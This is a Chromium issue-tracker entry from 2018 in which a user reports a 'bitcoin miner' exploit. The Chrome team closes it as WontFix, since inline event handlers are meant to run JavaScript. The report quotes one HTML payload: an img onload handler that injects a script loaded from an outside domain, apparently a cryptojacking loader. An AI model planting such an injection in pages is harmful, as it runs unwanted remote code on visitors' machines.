New issue
Advanced search Search tips

Issue 813367 link

Starred by 2 users

Issue metadata

Status: WontFix
Owner: ----
Closed: Feb 2018
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security



Sign in to add a comment

Security: Crypto currency mining exploit

Reported by garnisl...@gmail.com, Feb 17 2018

Issue description

VULNERABILITY DETAILS
I just noticed that an image or a character can be used to start the fxp. bitcoin miner attack.
This is that bit of code through which I found that out:
<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAUEBAAAACwAAAAAAQABAAACAkQBADs=" onload="$(document).append('<script src='http://h777a.ml/777/qp.js/' crossorigin='anonymous'></script>')" />
I won't put any more unnecessary examples nor will I attach any since this one shows it perfectly.

VERSION
Chrome Version: [63.0.3239.132] + [stable]
Operating System: Windows 10 Pro, 1709 Version, and 16299.248 OS Build


 
Components: Blink
Status: WontFix (was: Unconfirmed)
It is expected that an inline event handler can run JavaScript, and many sites depend on that functionality.
Project Member

Comment 2 by sheriffbot@chromium.org, May 27 2018

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment